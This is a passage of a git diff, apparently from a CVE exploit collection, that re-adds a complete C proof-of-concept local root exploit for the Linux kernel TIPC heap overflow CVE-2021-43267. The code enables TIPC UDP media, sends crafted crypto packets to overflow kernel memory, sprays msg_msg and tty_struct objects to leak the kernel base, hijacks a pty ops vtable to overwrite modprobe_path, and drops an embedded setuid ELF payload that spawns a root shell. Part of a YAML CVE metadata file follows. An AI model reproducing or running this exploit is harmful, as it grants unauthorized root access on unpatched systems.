-        if ((tty_fds[i] = open("/dev/ptmx", O_RDWR|O_NOCTTY)) < 0) {
-            fatal("failed to spray tty_struct %d/%d", i, MSG_COUNT);
-        }
-    }
-
-    for(int i = MSG_COUNT-1; i > 0; i--, peek_cnt++) {
-        int r = msgrcv(
-            queue_id[i], (void*)peekbuf, 0x2000, 0, MSG_COPY | IPC_NOWAIT
-        );
-
-        if (r < 0 || r == BODY_SIZE) {
-            continue;
-        }
-
-        info("we corrupted a msg_msg size field! (took %d peeks)\n", peek_cnt);
-
-        for(int j = 0; j < r; j += 4) {
-            if (*(uint32_t*)(peekbuf + j) != TTY_MAGIC) {
-                continue;
-            }
-
-            info("found tty_struct at offset 0x%x", j);
-            pty_ops = read64(peekbuf + j + 0x18);
-            mybuf = read64(peekbuf + j + 0x40) - 0x408;
-
-            info_value64("pty_ops", pty_ops);
-            info_value64("our buffer", mybuf);
-
-            memcpy(fake_tty, peekbuf + j, 0x20);
-            write64(fake_tty + 0x18, mybuf + NEXT_OFFSET);
-
-            // did we hit a master of slave ops ptr?
-            switch(pty_ops & 0xfff) {
-                case PTM_UNIX98_OPS & 0xfff:
-                    kernel_base = pty_ops - PTM_UNIX98_OPS;
-                break;
-
-                case PTS_UNIX98_OPS & 0xfff:
-                    kernel_base = pty_ops - PTS_UNIX98_OPS;
-                break;
-
-                default:
-                    fatal("this should never happen tbh");
-                break;
-            }
-
-            info_value64("kernel base", kernel_base);
-            break;
-        }
-
-        if (pty_ops != 0) {
-            break;
-        } else {
-            info("too bad, tty_struct didnt follow corrupted msg_msg.");
-        }
-    }
-
-    if (pty_ops == 0) {
-        for(int i =0; i < SPRAY_TTY_CNT; i++) {
-            close(tty_fds[i]);
-        }
-
-        fatal("infoleak failed. try again?");
-    }
-
-    info_value64("modprobe_path", kernel_base + MODPROBE_PATH);
-
-    dummy.type = MTYPE;
-    for(int i = 0; i < BODY_SIZE; i+=8) {
-        write64(dummy.body + i, kernel_base + GADGET_RET);
-    }
-    write64(dummy.body + 0x60, kernel_base + GADGET_WRITE32);
-
-    info("spray fake pty ops vtable");
-    for(int i = 0; i < MSG_COUNT; i++) {
-        for(int j = 0; j < 8; j++) {
-            if (msgsnd(queue_id[i], (void*)&dummy, BODY_SIZE, 0) < 0) {
-                perror("msgsnd");
-                fatal("failed to create message %d", i);
-            }
-        }
-    }
-
-    int hacked = 0;
-
-    dummy.type = MTYPE;
-    for(int try = 0; try < TRIES_MAX; try++) {
-        info("attempting to corrupt tty_struct (try %d)", try);
-
-        if (msgsnd(queue_id_final, (void*)&dummy, BODY_SIZE, 0) < 0) {
-            perror("msgsnd");
-            fatal("failed to create message");
-        }
-
-        if ((tty_fds[0] = open("/dev/ptmx", O_RDWR|O_NOCTTY)) < 0) {
-            fatal("failed to alloc tty_struct");
-        }
-
-        if(msgrcv(queue_id_final, (void*)&dummy, BODY_SIZE, MTYPE, 0) < 0) {
-            perror("msgrcv");
-            fatal("failed to receive message");
-        }
-
-        tipc_trigger(fake_tty, 0x20, ++seqno);
-
-        int r = 0;
-        r = ioctl(tty_fds[0], 0x706d742f, kernel_base + MODPROBE_PATH);
-        if (r == 0) {
-            info("maybe I have some good news..");
-            r = ioctl(tty_fds[0], 0x7861682f, kernel_base + MODPROBE_PATH + 4);
-            hacked = 1;
-            break;
-        } else {
-            close(tty_fds[0]);
-        }
-    }
-
-    if (!hacked) {
-        fatal("hacking computer failed.");
-    } 
-
-    info("triggering modprobe\n");
-    system("/tmp/benign");
-    sleep(1);
-
-    info("popping shell\n");
-    system("/tmp/sh");
-
-    for(int j = 0; j < SPRAY_TTY_CNT; j++) {
-        close(tty_fds[j]);
-    }
-
-    return 0;
+/* 
+ * Local PoC exploit for CVE-2021-43267 [1]
+ *
+ * I want to see someone make a remote exploit for this.
+ *
+ * Only really tested on my local copy of 5.15. But given that you need the
+ * TIPC module loaded it is unlikely scriptkiddies will have a use for this.
+ *
+ * Exploit is a bit CTF quality. Feel free to send me revised copies. 
+ *
+ * Enjoy!
+ *
+ * [1] https://www.sentinelone.com/labs/tipc-remote-linux-kernel-heap-overflow-
+ *     allows-arbitrary-code-execution/
+ */
+
+#include <stdio.h>
+#include <string.h>
+#include <stdlib.h>
+#include <stdbool.h>
+#include <stdarg.h>
+#include <arpa/inet.h>
+#include <sys/socket.h>
+#include <sys/ipc.h>
+#include <sys/ioctl.h>
+#include <sys/msg.h>
+#include <sys/stat.h>
+#include <fcntl.h>
+#include <time.h>
+#include <unistd.h>
+#include <linux/netlink.h>
+
+// these are offsets for my kernel, not yours
+#define PTM_UNIX98_OPS 0x127f840 // \__ no exported syms, look for xref to str
+#define PTS_UNIX98_OPS 0x127f960 // /   `Couldn't allocate Unix98 ptm driver`
+#define MODPROBE_PATH  0x16500E0 // has symbol
+#define GADGET_WRITE32 0x2c51f5  // 31 c0 48 89 32 c3
+#define GADGET_RET     0x2c51fa  // c3
+
+// good numbers
+#define KEY_SIZE       956
+#define MSG_COUNT      2048
+#define BODY_SIZE      976
+#define SMASH_SIZE     32
+#define TRIES_MAX      8
+#define NEXT_OFFSET    0x8000
+
+// some constants
+#define NODE_ID        0x11223344
+#define MTYPE          0xAB /* Ac1db34v3rz */
+#define SPRAY_TTY_CNT  0x40
+#define TTY_MAGIC      0x5401
+#define TIPC_UDP_PORT  6118
+#define MSG_COPY       040000
+
+// TIPC crap
+#define TIPC_VERSION   2
+
+// user messages
+#define LINK_PROTOCOL  7
+#define LINK_CONFIG    13
+
+// message types
+#define STATE_MSG      0
+#define RESET_MSG      1
+#define ACTIVATE_MSG   2
+#define MSG_CRYPTO     14
+
+// media types
+#define MEDIA_TYPE_UDP 3
+
+// w0
+#define hdr_msg_size(v) ((v) & 0x1ffff)
+#define hdr_size(v) ((v & 0xf) << 21)
+#define hdr_user(v) ((v & 0xf) << 25)
+#define hdr_nonseq(v) ((v & 1) << 20)
+#define hdr_version(v) ((v & 7) << 29)
+
+// w1
+#define hdr_msg_type(v) ((v & 7) << 29)
+
+// w2
+#define hdr_link_level_seq(v) (v & 0xffff)
+
+// w4
+#define hdr_next_send_pkt(v) (v & 0xffff)
+
+// w5
+#define hdr_media_id(v) (v & 0xff)
+#define hdr_session_number(v) ((v & 0xffff) << 16)
+
+// prototypes
+struct message_t {
+    long type;
+    uint8_t body[BODY_SIZE];
+};
+
+// globals
+int g_sockfd = 0;
+struct sockaddr_in g_sockaddr;
+
+// utility
+#define info(fmt, args...) report('$', false, fmt, ## args)
+#define infov(fmt, args...) report('~', false, fmt, ## args)
+#define maybe(fmt, args...) report('?', false, fmt, ## args)
+#define fatal(fmt, args...) report('!', true, fmt, ## args)
+#define info_value64(name, value) infov("%-24s: %016lx", name, value)
+
+void report(char indicator, bool error, const char *fmt, ...) {
+    FILE *stream = (error) ? stderr : stdout;
+    va_list a;
+    va_start(a, fmt);
+    fprintf(stream, "[%c] %s", indicator, (error) ? "ERROR: " : "");
+    vfprintf(stream, fmt, a);
+    fprintf(stream, "\n");
+    va_end(a);
+
+    if (error) {
+        exit(-1); // all errors are fatal
+    }
+}
+
+void usage(char *prog) {
+    printf("usage: %s <interface IP>\n\n", prog);
+}
+
+static inline void write64(uint8_t *p, uint64_t v) {
+    *(uint64_t*)(p) = v;
+}
+
+static inline uint64_t read64(uint8_t *p) {
+    return *(uint64_t*)(p);
+}
+
+#define be32 htonl
+
+// netlink
+int netlink_send(
+    uint16_t type, uint16_t flags, uint32_t seq, 
+    uint8_t* pkt, size_t pkt_len,
+    uint8_t **reply_buf, size_t *reply_sz
+) {
+    int sock_fd;
+    struct sockaddr_nl sa;
+    memset(&sa, 0, sizeof(struct sockaddr_nl));
+    sa.nl_family = AF_NETLINK;
+
+    size_t pkt_full_len = sizeof(struct nlmsghdr) + pkt_len;
+    uint8_t *pkt_full = malloc(pkt_full_len);
+    memset(pkt_full, 0, pkt_full_len); 
+    memcpy(pkt_full + sizeof(struct nlmsghdr), pkt, pkt_len);
+
+    struct nlmsghdr *netlink_hdr = (struct nlmsghdr*)(pkt_full);
+    netlink_hdr->nlmsg_len = pkt_full_len;
+    netlink_hdr->nlmsg_type = type;
+    netlink_hdr->nlmsg_flags = flags;
+    netlink_hdr->nlmsg_seq = seq;
+    netlink_hdr->nlmsg_pid = getpid();
+
+    if ((sock_fd = socket(PF_NETLINK, SOCK_RAW, NETLINK_GENERIC)) < 0) {
+        perror("socket");
+        return -1;
+    }
+
+    if (bind(sock_fd, (struct sockaddr*)&sa, sizeof(sa)) < 0) {
+        perror("bind");
+        return -1;
+    }
+
+    ssize_t r = sendto(
+        sock_fd, pkt_full, pkt_full_len, 0, 
+        (struct sockaddr*)&sa, sizeof(struct sockaddr_nl)
+    );
+
+    if (r < 0) {
+        perror("sendto");
+        return -1;
+    }
+
+    free(pkt_full);
+
+    if (reply_buf != NULL) {
+        struct msghdr m;
+        memset(&m, 0, sizeof(struct msghdr));
+        m.msg_iovlen = 1;
+        m.msg_iov = malloc(sizeof(struct iovec));
+        m.msg_iov->iov_base = malloc(0x1000);
+        m.msg_iov->iov_len = 0x1000;
+
+        size_t nread;
+
+        if ((nread = recvmsg(sock_fd, &m, 0)) < 0) {
+            goto error;
+        }
+
+        if (m.msg_iovlen != 1) {
+            goto error;
+        }
+
+        *reply_sz = nread;
+        *reply_buf = malloc(*reply_sz);
+        memcpy(*reply_buf, m.msg_iov->iov_base, *reply_sz);
+        free(m.msg_iov->iov_base);
+    }
+
+    close(sock_fd);
+    return 0;
+
+error:
+    close(sock_fd);
+    return -1;
+}
+
+int netlink_enable_tipc_udp(char *str_ip_address) {
+    uint8_t pkt_ctrl[]={
+        0x03, 0x01, 0x00, 0x00, 0x06, 0x00, 0x01, 0x00, 
+        0x10, 0x00, 0x00, 0x00, 0x0b, 0x00, 0x02, 0x00, 
+        0x54, 0x49, 0x50, 0x43, 0x76, 0x32, 0x00, 0x00
+    };
+
+    uint8_t *nl_reply;
+    size_t nl_reply_len = 0;
+    uint32_t ip_addr;
+    uint32_t seq;
+    int r;
+
+    seq = time(NULL);
+
+    ip_addr = inet_addr(str_ip_address);
+    if (ip_addr == INADDR_NONE) {
+        fatal("invalid ip address given");
+    }
+
+    r = netlink_send(
+        NLMSG_MIN_TYPE, (NLM_F_REQUEST | NLM_F_ACK), seq,
+        pkt_ctrl, sizeof(pkt_ctrl), &nl_reply, &nl_reply_len
+    );
+
+    if(r < 0) {
+        fatal("failed to send netlink control message.");
+    }
+
+    if (nl_reply_len == 0) {
+        fatal("did not get netlink control message reply.");
+    }
+
+    if (*(uint32_t*)(nl_reply + 0x10) == 0xfffffffe) {
+        fatal("tipc support not available.");
+    }
+
+    uint16_t nlmsg_type = 0;
+    off_t pos = 0x14;
+
+    while(pos < nl_reply_len - 4) {
+        struct nlattr *attr = (struct nlattr*)(nl_reply + pos);
+        if (attr->nla_type == 1) {
+            nlmsg_type = *(uint16_t*)(nl_reply + pos + 4);
+            break;
+        }
+        pos += attr->nla_len;
+        if ((attr->nla_len % 4) != 0) {
+            pos += 4 - (attr->nla_len % 4);
+        }
+    }
+
+    if (nlmsg_type == 0) {
+        fatal("could not find tipc netlink message type.");
+    }
+
+    uint8_t pkt_tipc_enable_udp[]={
+        0x03, 0x01, 0x00, 0x00, 0x40, 0x00, 0x01, 0x80,
+        0x0d, 0x00, 0x01, 0x00, 0x75, 0x64, 0x70, 0x3a,
+        0x55, 0x44, 0x50, 0x31, 0x00, 0x00, 0x00, 0x00,
+        0x2c, 0x00, 0x04, 0x80, 0x14, 0x00, 0x01, 0x00,
+        0x02, 0x00, 0x17, 0xe6, 0x00, 0x00, 0x00, 0x00, // <-- +0x24 = ip
+        0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00,
+        0x14, 0x00, 0x02, 0x00, 0x02, 0x00, 0x17, 0xe6,
+        0xe4, 0x00, 0x12, 0x67, 0x00, 0x00, 0x00, 0x00,
+        0x00, 0x00, 0x00, 0x00
+    };
+
+    *(uint32_t*)(pkt_tipc_enable_udp + 0x24) = ip_addr;
+
+    r = netlink_send(
+        nlmsg_type, (NLM_F_REQUEST | NLM_F_ACK), seq, 
+        pkt_tipc_enable_udp, sizeof(pkt_tipc_enable_udp), NULL, NULL
+    );
+
+    if (r < 0) {
+        fatal("failed to send netlink tipc udp enable message.");
+    }
+
+    // the right way is to read back a netlink reply and check if this worked..
+    // I chose to go with the scientifically proven method of big chillin'
+    sleep(2);
+
+    return 0;
+}
+
+// tipc packet routines
+void gen_tipc_hdr(
+    uint8_t *o,
+    uint32_t w0, uint32_t w1, uint32_t w2, 
+    uint32_t w3, uint32_t w4, uint32_t w5
+) {
+    uint32_t* o32 = (uint32_t*)o;
+    o32[0] = be32(w0);
+    o32[1] = be32(w1);
+    o32[2] = be32(w2);
+    o32[3] = be32(w3);
+    o32[4] = be32(w4);
+    o32[5] = be32(w5);
+}
+
+ssize_t tipc_send(uint8_t *buf, size_t sz) {
+    return sendto(
+        g_sockfd, buf, sz, 0, (struct sockaddr*)&g_sockaddr, sizeof(g_sockaddr)
+    );
+}
+
+void tipc_discover() {
+    uint32_t w0, w1, w2, w3, w4, w5;
+    uint8_t pkt[24];
+    w0 = 0;
+    w0 |= hdr_version(TIPC_VERSION);
+    w0 |= hdr_size(6);
+    w0 |= hdr_msg_size(24);
+    w0 |= hdr_user(LINK_CONFIG);
+    w0 |= hdr_nonseq(1);
+    w1 = 0;
+    w2 = 0;
+    w3 = NODE_ID;
+    w4 = 0x1267;
+    w5 = hdr_media_id(MEDIA_TYPE_UDP);
+    gen_tipc_hdr(pkt, w0, w1, w2, w3, w4, w5);
+    tipc_send(pkt, sizeof(pkt));
+}
+
+void tipc_link_state_a(uint32_t ip) {
+    uint8_t pkt[56];
+    uint32_t *body = (uint32_t*)(pkt + 24);
+    uint32_t w0, w1, w2, w3, w4, w5;
+
+    memset(pkt, 0, sizeof(pkt));
+
+    w0 = hdr_version(TIPC_VERSION);
+    w0 |= hdr_size(10);
+    w0 |= hdr_user(LINK_PROTOCOL);
+    w0 |= hdr_msg_size(56);
+    w1 = hdr_msg_type(RESET_MSG);
+    w2 = hdr_link_level_seq(0x8000);
+    w3 = NODE_ID;
+    w4 = hdr_next_send_pkt(1);
+    w5 = hdr_session_number(50388);
+    gen_tipc_hdr(pkt, w0, w1, w2, w3, w4, w5);
+
+    int pos = 0;
+    body[pos++] = be32(NODE_ID);
+    body[pos++] = be32(ip);
+    body[pos++] = 0;
+    body[pos++] = be32(3500 << 16);
+    memcpy(body + 4, "UDP1", 4);
+    tipc_send(pkt, sizeof(pkt));
+}
+
+void tipc_link_state_b(uint32_t ip) {
+    uint8_t pkt[44];
+    uint32_t w0, w1, w2, w3, w4, w5;
+    uint32_t *body = (uint32_t*)(pkt + 24);
+
+    memset(pkt, 0, sizeof(pkt));
+
+    w0 = hdr_version(TIPC_VERSION);
+    w0 |= hdr_size(10);
+    w0 |= hdr_user(LINK_PROTOCOL);
+    w0 |= hdr_msg_size(44);
+    w1 = hdr_msg_type(STATE_MSG);
+    w2 = hdr_link_level_seq(1);
+    w3 = NODE_ID;
+    w4 = hdr_next_send_pkt(1);
+    w5 = hdr_session_number(50388);
+
+    gen_tipc_hdr(pkt, w0, w1, w2, w3, w4, w5);
+
+    int pos = 0;
+    body[pos++] = be32(NODE_ID);
+    body[pos++] = be32(ip);
+    body[pos++] = 0; // timestamp
+    body[pos++] = 0; // max pkt/link tolerance
+    body[pos++] = 0; // bearer instance
+    tipc_send(pkt, sizeof(pkt));
+}
+
+int tipc_link_setup(char *host) {
+    if ((g_sockfd = socket(AF_INET, SOCK_DGRAM, IPPROTO_UDP)) == -1) {
+        perror("socket");
+        return -1;
+    }
+
+    memset((char *) &g_sockaddr, 0, sizeof(g_sockaddr));
+    g_sockaddr.sin_family = AF_INET;
+    g_sockaddr.sin_port = htons(TIPC_UDP_PORT);
+
+    if (inet_aton(host, &g_sockaddr.sin_addr) == 0) {
+        perror("inet_aton");
+        return -1;
+    }
+
+    tipc_discover();
+    tipc_link_state_a(be32(inet_addr(host)));
+    tipc_link_state_b(be32(inet_addr(host)));
+
+    return 0;
+}
+
+void tipc_trigger(uint8_t *smashbuf, uint32_t smashlen, int seqno) {
+    uint8_t pkt[0x1000];
+    uint32_t w0, w1, w2, w3, w4, w5;
+
+    w0 = hdr_version(TIPC_VERSION);
+    w0 |= hdr_size(6);
+    w0 |= hdr_user(MSG_CRYPTO);
+    w0 |= hdr_msg_size(24 + 36 + KEY_SIZE);
+    w1 = 0;
+    w2 = seqno;
+    w3 = NODE_ID;
+    w4 = 0;
+    w5 = 0;
+
+    memset(pkt, 0, sizeof(pkt));
+    gen_tipc_hdr(pkt, w0, w1, w2, w3, w4, w5);
+
+    memcpy(pkt+24, "HAXX", 4);
+    *(uint32_t*)(pkt+24+32) = be32(KEY_SIZE + SMASH_SIZE + smashlen);
+    memset(pkt+24+36, 'C', KEY_SIZE);
+    memset(pkt+24+36+KEY_SIZE, 'D', SMASH_SIZE);
+    memcpy(pkt+24+36+KEY_SIZE + SMASH_SIZE, smashbuf, smashlen);
+    tipc_send(pkt, sizeof(pkt));
+}
+
+int setup_modprobe_hax() {
+    // small ELF file matroshka doll that does;
+    //   fd = open("/tmp/sh", O_WRONLY | O_CREAT | O_TRUNC);
+    //   write(fd, elfcode, elfcode_len)
+    //   chmod("/tmp/sh", 04755)
+    //   close(fd);
+    //   exit(0);
+    //
+    // the dropped ELF simply does:
+    //   setuid(0);
+    //   setgid(0);
+    //   execve("/bin/sh", ["/bin/sh", NULL], [NULL]);
+    unsigned char elfcode[] = {
+        0x7f, 0x45, 0x4c, 0x46, 0x02, 0x01, 0x01, 0x00, 0x00, 0x00, 0x00, 0x00,
+        0x00, 0x00, 0x00, 0x00, 0x02, 0x00, 0x3e, 0x00, 0x01, 0x00, 0x00, 0x00,
+        0x78, 0x00, 0x40, 0x00, 0x00, 0x00, 0x00, 0x00, 0x40, 0x00, 0x00, 0x00,
+        0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00,
+        0x00, 0x00, 0x00, 0x00, 0x40, 0x00, 0x38, 0x00, 0x01, 0x00, 0x00, 0x00,
+        0x00, 0x00, 0x00, 0x00, 0x01, 0x00, 0x00, 0x00, 0x05, 0x00, 0x00, 0x00,
+        0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x40, 0x00,
+        0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x40, 0x00, 0x00, 0x00, 0x00, 0x00,
+        0x97, 0x01, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x97, 0x01, 0x00, 0x00,
+        0x00, 0x00, 0x00, 0x00, 0x00, 0x10, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00,
+        0x48, 0x8d, 0x3d, 0x56, 0x00, 0x00, 0x00, 0x48, 0xc7, 0xc6, 0x41, 0x02,
+        0x00, 0x00, 0x48, 0xc7, 0xc0, 0x02, 0x00, 0x00, 0x00, 0x0f, 0x05, 0x48,
+        0x89, 0xc7, 0x48, 0x8d, 0x35, 0x44, 0x00, 0x00, 0x00, 0x48, 0xc7, 0xc2,
+        0xba, 0x00, 0x00, 0x00, 0x48, 0xc7, 0xc0, 0x01, 0x00, 0x00, 0x00, 0x0f,
+        0x05, 0x48, 0xc7, 0xc0, 0x03, 0x00, 0x00, 0x00, 0x0f, 0x05, 0x48, 0x8d,
+        0x3d, 0x1c, 0x00, 0x00, 0x00, 0x48, 0xc7, 0xc6, 0xed, 0x09, 0x00, 0x00,
+        0x48, 0xc7, 0xc0, 0x5a, 0x00, 0x00, 0x00, 0x0f, 0x05, 0x48, 0x31, 0xff,
+        0x48, 0xc7, 0xc0, 0x3c, 0x00, 0x00, 0x00, 0x0f, 0x05, 0x2f, 0x74, 0x6d,
+        0x70, 0x2f, 0x73, 0x68, 0x00, 0x7f, 0x45, 0x4c, 0x46, 0x02, 0x01, 0x01,
+        0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x02, 0x00, 0x3e,
+        0x00, 0x01, 0x00, 0x00, 0x00, 0x78, 0x00, 0x40, 0x00, 0x00, 0x00, 0x00,
+        0x00, 0x40, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00,
+        0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x40, 0x00, 0x38,
+        0x00, 0x01, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x01, 0x00, 0x00,
+        0x00, 0x05, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00,
+        0x00, 0x00, 0x00, 0x40, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x40,
+        0x00, 0x00, 0x00, 0x00, 0x00, 0xba, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00,
+        0x00, 0xba, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x10, 0x00,
+        0x00, 0x00, 0x00, 0x00, 0x00, 0x48, 0x31, 0xff, 0x48, 0xc7, 0xc0, 0x69,
+        0x00, 0x00, 0x00, 0x0f, 0x05, 0x48, 0x31, 0xff, 0x48, 0xc7, 0xc0, 0x6a,
+        0x00, 0x00, 0x00, 0x0f, 0x05, 0x48, 0x8d, 0x3d, 0x1b, 0x00, 0x00, 0x00,
+        0x6a, 0x00, 0x48, 0x89, 0xe2, 0x57, 0x48, 0x89, 0xe6, 0x48, 0xc7, 0xc0,
+        0x3b, 0x00, 0x00, 0x00, 0x0f, 0x05, 0x48, 0xc7, 0xc0, 0x3c, 0x00, 0x00,
+        0x00, 0x0f, 0x05, 0x2f, 0x62, 0x69, 0x6e, 0x2f, 0x73, 0x68, 0x00
+    };
+
+    FILE *fp;
+
+    fp = fopen("/tmp/benign", "wb");
+    if (fp == NULL) {
+        perror("fopen");
+        return -1;
+    }
+
+    if (fwrite("\xff\xff\xff\xff", 4, 1, fp) < 1) {
+        perror("fwrite");
+        return -1;
+    }
+    fclose(fp);
+
+    fp = fopen("/tmp/hax", "wb");
+    if (fp == NULL) {
+        perror("fopen");
+        return -1;
+    }
+
+    if (fwrite(elfcode, sizeof(elfcode), 1, fp) < 1) {
+        perror("fwrite");
+        return -1;
+    }
+    fclose(fp);
+
+    if (chmod("/tmp/benign", 0777) < 0) {
+        perror("chmod");
+        return -1;
+    }
+
+    if (chmod("/tmp/hax", 0777) < 0) {
+        perror("chmod");
+        return -1;
+    }
+
+    return 0;
+}
+
+int main(int argc, char *argv[]) {
+    uint64_t pty_ops = 0;
+    uint64_t mybuf = 0;
+    uint64_t kernel_base = 0;
+
+    uint8_t fake_tty[0x20];
+    uint8_t peekbuf[0x2000];
+
+    int peek_cnt = 1;
+    int seqno=0;
+
+    int tty_fds[SPRAY_TTY_CNT];
+    int queue_id[MSG_COUNT];
+    int queue_id_final = 0;
+
+    struct message_t dummy;
+    dummy.type = MTYPE;
+    memset(dummy.body, 0x58, BODY_SIZE);
+
+    fprintf(stdout,
+        "\n"
+        "      $$$ Linux 5.10-5.15 CVE-2021-43267 exploit  $$$\n"
+        "              -- by blasty <peter@haxx.in> --\n\n"
+    );
+
+    if (argc != 2) {
+        usage(argv[0]);
+        return -1;
+    }
+
+    info("enabling tipc udp media");
+    if (netlink_enable_tipc_udp(argv[1]) < 0) {
+        fatal("failed to enable tipc udp media");
+    }
+
+    info("establish tipc link");
+    if (tipc_link_setup(argv[1]) < 0) {
+        fatal("failed to establish tipc link");
+    }
+
+    info("installing helpers");
+    if (setup_modprobe_hax() < 0) {
+        fatal("failed to setup helpers");
+    }
+
+    info("create messages queues");
+    if ((queue_id_final = msgget(IPC_PRIVATE, IPC_CREAT | 0666)) < 0) {
+        perror("msgget");
+        fatal("failed to create message queue");
+    }
+
+    for(int i = 0; i < MSG_COUNT; i++) {
+        if ((queue_id[i] = msgget(IPC_PRIVATE, IPC_CREAT | 0666)) < 0) {
+            perror("msgget");
+            fatal("failed to create message queue %d", i);
+        }
+    }
+
+    info("spray messages");
+    for(int i = 0; i < MSG_COUNT; i++) {
+        if (msgsnd(queue_id[i], (void*)&dummy, BODY_SIZE, 0) < 0) {
+            perror("msgsnd");
+            fatal("failed to create message in queue %d", i);
+        }
+    }
+
+    info("poking holes");
+    for(int i = 0; i < MSG_COUNT; i += 2) {
+        if(msgrcv(queue_id[i], (void*)&dummy, BODY_SIZE, MTYPE, 0) < 0) {
+            perror("msgrcv");
+            fatal("failed to peek message in queue %d", i);
+        }
+    }
+
+    info("tipc bug trigger");
+
+    uint64_t hacked_msg[4]={
+        0,      // m_list.prev
+        0,      // m_list.next
+        MTYPE,  // m_type
+        0x2000, // m_ts
+    };
+
+    tipc_trigger((uint8_t*)hacked_msg, 0x20, ++seqno);
+
+    info("spraying tty_struct\n");
+    for(int i = 0; i < SPRAY_TTY_CNT; i++) {
+        if ((tty_fds[i] = open("/dev/ptmx", O_RDWR|O_NOCTTY)) < 0) {
+            fatal("failed to spray tty_struct %d/%d", i, MSG_COUNT);
+        }
+    }
+
+    for(int i = MSG_COUNT-1; i > 0; i--, peek_cnt++) {
+        int r = msgrcv(
+            queue_id[i], (void*)peekbuf, 0x2000, 0, MSG_COPY | IPC_NOWAIT
+        );
+
+        if (r < 0 || r == BODY_SIZE) {
+            continue;
+        }
+
+        info("we corrupted a msg_msg size field! (took %d peeks)\n", peek_cnt);
+
+        for(int j = 0; j < r; j += 4) {
+            if (*(uint32_t*)(peekbuf + j) != TTY_MAGIC) {
+                continue;
+            }
+
+            info("found tty_struct at offset 0x%x", j);
+            pty_ops = read64(peekbuf + j + 0x18);
+            mybuf = read64(peekbuf + j + 0x40) - 0x408;
+
+            info_value64("pty_ops", pty_ops);
+            info_value64("our buffer", mybuf);
+
+            memcpy(fake_tty, peekbuf + j, 0x20);
+            write64(fake_tty + 0x18, mybuf + NEXT_OFFSET);
+
+            // did we hit a master of slave ops ptr?
+            switch(pty_ops & 0xfff) {
+                case PTM_UNIX98_OPS & 0xfff:
+                    kernel_base = pty_ops - PTM_UNIX98_OPS;
+                break;
+
+                case PTS_UNIX98_OPS & 0xfff:
+                    kernel_base = pty_ops - PTS_UNIX98_OPS;
+                break;
+
+                default:
+                    fatal("this should never happen tbh");
+                break;
+            }
+
+            info_value64("kernel base", kernel_base);
+            break;
+        }
+
+        if (pty_ops != 0) {
+            break;
+        } else {
+            info("too bad, tty_struct didnt follow corrupted msg_msg.");
+        }
+    }
+
+    if (pty_ops == 0) {
+        for(int i =0; i < SPRAY_TTY_CNT; i++) {
+            close(tty_fds[i]);
+        }
+
+        fatal("infoleak failed. try again?");
+    }
+
+    info_value64("modprobe_path", kernel_base + MODPROBE_PATH);
+
+    dummy.type = MTYPE;
+    for(int i = 0; i < BODY_SIZE; i+=8) {
+        write64(dummy.body + i, kernel_base + GADGET_RET);
+    }
+    write64(dummy.body + 0x60, kernel_base + GADGET_WRITE32);
+
+    info("spray fake pty ops vtable");
+    for(int i = 0; i < MSG_COUNT; i++) {
+        for(int j = 0; j < 8; j++) {
+            if (msgsnd(queue_id[i], (void*)&dummy, BODY_SIZE, 0) < 0) {
+                perror("msgsnd");
+                fatal("failed to create message %d", i);
+            }
+        }
+    }
+
+    int hacked = 0;
+
+    dummy.type = MTYPE;
+    for(int try = 0; try < TRIES_MAX; try++) {
+        info("attempting to corrupt tty_struct (try %d)", try);
+
+        if (msgsnd(queue_id_final, (void*)&dummy, BODY_SIZE, 0) < 0) {
+            perror("msgsnd");
+            fatal("failed to create message");
+        }
+
+        if ((tty_fds[0] = open("/dev/ptmx", O_RDWR|O_NOCTTY)) < 0) {
+            fatal("failed to alloc tty_struct");
+        }
+
+        if(msgrcv(queue_id_final, (void*)&dummy, BODY_SIZE, MTYPE, 0) < 0) {
+            perror("msgrcv");
+            fatal("failed to receive message");
+        }
+
+        tipc_trigger(fake_tty, 0x20, ++seqno);
+
+        int r = 0;
+        r = ioctl(tty_fds[0], 0x706d742f, kernel_base + MODPROBE_PATH);
+        if (r == 0) {
+            info("maybe I have some good news..");
+            r = ioctl(tty_fds[0], 0x7861682f, kernel_base + MODPROBE_PATH + 4);
+            hacked = 1;
+            break;
+        } else {
+            close(tty_fds[0]);
+        }
+    }
+
+    if (!hacked) {
+        fatal("hacking computer failed.");
+    } 
+
+    info("triggering modprobe\n");
+    system("/tmp/benign");
+    sleep(1);
+
+    info("popping shell\n");
+    system("/tmp/sh");
+
+    for(int j = 0; j < SPRAY_TTY_CNT; j++) {
+        close(tty_fds[j]);
+    }
+
+    return 0;
 }
\ No newline at end of file
diff --git a/cve/linux-kernel/2021/yaml/CVE-2021-4154.yaml b/cve/linux-kernel/2021/yaml/CVE-2021-4154.yaml
index 15bc9b53..18d4c2ae 100644
--- a/cve/linux-kernel/2021/yaml/CVE-2021-4154.yaml
+++ b/cve/linux-kernel/2021/yaml/CVE-2021-4154.yaml
@@ -1,20 +1,20 @@
-id: CVE-2021-4154
-source: https://github.com/Markakd/CVE-2021-4154
-info:
-  name: Linux kernel是美国Linux基金会的开源操作系统Linux所使用的内核。
-  severity: high
-  description: |
-    A use-after-free flaw was found in cgroup1_parse_param in kernel/cgroup/cgroup-v1.c in the Linux kernel's cgroup v1 parser. A local attacker with a user privilege could cause a privilege escalation by exploiting the fsconfig syscall parameter leading to a container breakout and a denial of service on the system.
-  scope-of-influence:
-    Linux Kernel versions prior to 5.14 rc2
-  reference:
-    - https://bugzilla.redhat.com/show_bug.cgi?id=2034514	
-    - https://cloud.google.com/anthos/clusters/docs/security-bulletins#gcp-2022-002	
